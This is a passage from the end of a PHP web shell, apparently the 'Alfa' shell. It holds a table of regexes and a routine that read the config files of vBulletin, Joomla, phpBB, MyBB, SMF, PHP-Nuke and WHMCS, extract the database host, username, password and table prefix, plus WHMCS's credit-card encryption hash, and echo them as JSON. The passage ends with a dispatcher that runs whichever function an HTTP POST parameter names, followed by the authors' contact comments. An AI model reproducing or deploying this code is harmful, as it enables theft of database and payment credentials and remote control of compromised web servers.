7288'dbuser'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")username(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
7289'dbname'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")dbname(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
7290'dbpw'=>array("/config\[(?:'|\")MasterServer(?:'|\")\]\[(?:'|\")password(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3),
7291'prefix'=>array("/config\[(?:'|\")Database(?:'|\")\]\[(?:'|\")tableprefix(?:'|\")\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\")[ ]{0,};/",3)
7292),
7293'phpnuke'=>array('file'=>'/config.php',
7294'host'=>array('/dbhost(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7295'dbname'=>array('/dbname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7296'dbuser'=>array('/dbuname(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7297'dbpw'=>array('/dbpass(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3),
7298'prefix'=>array('/prefix(\s+)=(\s+)(?:\'|")(.*?)(?:\'|");/',3)
7299),
7300'smf'=>array('file'=>'/Settings.php',
7301'host'=>array("/db_server(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7302'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7303'dbuser'=>array("/db_user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7304'dbpw'=>array("/db_passwd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7305'prefix'=>array("/db_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7306),
7307'whmcs'=>array('file'=>'/configuration.php',
7308'host'=>array("/db_host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7309'dbname'=>array("/db_name(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7310'dbuser'=>array("/db_username(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7311'dbpw'=>array("/db_password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7312'cc_encryption_hash'=>array("/cc_encryption_hash(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7313),
7314'joomla'=>array('file'=>'/configuration.php',
7315'host'=>array("/\\\$host(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7316'dbname'=>array("/\\\$db(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7317'dbuser'=>array("/\\\$user(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7318'dbpw'=>array("/\\\$password(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7319'prefix'=>array("/\\\$dbprefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7320),
7321'phpbb'=>array('file'=>'/config.php',
7322'host'=>array("/dbhost(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7323'dbname'=>array("/dbname(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7324'dbuser'=>array("/dbuser(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7325'dbpw'=>array("/dbpasswd(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7326'prefix'=>array("/table_prefix(\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7327),
7328'mybb'=>array('file'=>'/inc/config.php',
7329'host'=>array("/config\['database'\]\['hostname'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7330'dbname'=>array("/config\['database'\]\['database'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7331'dbuser'=>array("/config\['database'\]\['username'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7332'dbpw'=>array("/config\['database'\]\['password'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3),
7333'prefix'=>array("/config\['database'\]\['table_prefix'\](\s+)=(\s+)(?:'|\")(.*?)(?:'|\");/",3)
7334)
7335);
7336if($cms == "drupal"){
7337 $file = $config[$cms]['file'];
7338 $file=$path.$file;
7339 if(@is_file($file)||_alfa_is_dir($file,"-e")){
7340 }else{
7341 $cms = 'drupal2';
7342 }
7343}
7344if($cms == "vb"){
7345 $file = $config[$cms]['file'];
7346 $file=$path.$file;
7347 if(@is_file($file)||_alfa_is_dir($file,"-e")){
7348 }else{
7349 $path .= '/core';
7350 }
7351}
7352$data = array();
7353$srch_host = $config[$cms]['host'][0];
7354$srch_user = $config[$cms]['dbuser'][0];
7355$srch_name = $config[$cms]['dbname'][0];
7356$srch_pw = $config[$cms]['dbpw'][0];
7357$prefix = $config[$cms]['prefix'][0];
7358$file = $config[$cms]['file'];
7359$chost = $config[$cms]['host'][1];
7360$cuser = $config[$cms]['dbuser'][1];
7361$cname = $config[$cms]['dbname'][1];
7362$cpw = $config[$cms]['dbpw'][1];
7363$cprefix = $config[$cms]['prefix'][1];
7364if(@is_dir($path)||_alfa_is_dir($path)){
7365$file=$path.$file;
7366}elseif(@is_file($path)||_alfa_is_dir($path,"-e")){
7367$file=$path;
7368}else{
7369return false;
7370}
7371$file = __read_file($file);
7372if($cms == "drupal2"){
7373 $file = preg_replace("/\@code(.*?)\@endcode/s", "", $file);
7374}elseif($cms == "vb"){
7375 $file = preg_replace("/right of the(.*?)BAD!/s", "", $file);
7376}
7377if(preg_match($srch_host, $file, $mach)){
7378$data['host'] = $mach[$chost];
7379}
7380if(preg_match($srch_user, $file, $mach)){
7381$data['user'] = $mach[$cuser];
7382}
7383if(preg_match($srch_name, $file, $mach)){
7384$data['dbname'] = $mach[$cname];
7385}
7386if(preg_match($srch_pw, $file, $mach)){
7387$data['password'] = $mach[$cpw];
7388}
7389if(isset($prefix)){
7390if(preg_match($prefix, $file, $mach)){
7391$data['prefix'] = $mach[$cprefix];
7392}
7393}
7394if($cms=='whmcs'){
7395if(preg_match($config[$cms]['cc_encryption_hash'][0], $file, $mach)){
7396$data['cc_encryption_hash'] = $mach[3];
7397}
7398}
7399echo json_encode($data);
7400}
7401if(empty($_POST['a']))
7402if(isset($default_action) && function_exists('alfa' . $default_action))
7403$_POST['a'] = $default_action;
7404else
7405$_POST['a'] = 'FilesMan2';//'FilesMan';
7406if(!empty($_POST['a']) && function_exists('alfa' . $_POST['a']))
7407call_user_func('alfa' . $_POST['a']);
7408exit;
7409/*
7410#Persian Gulf For Ever
7411#skype : sole.sad
7412#skype : ehsan.invisible
7413*/
7414?>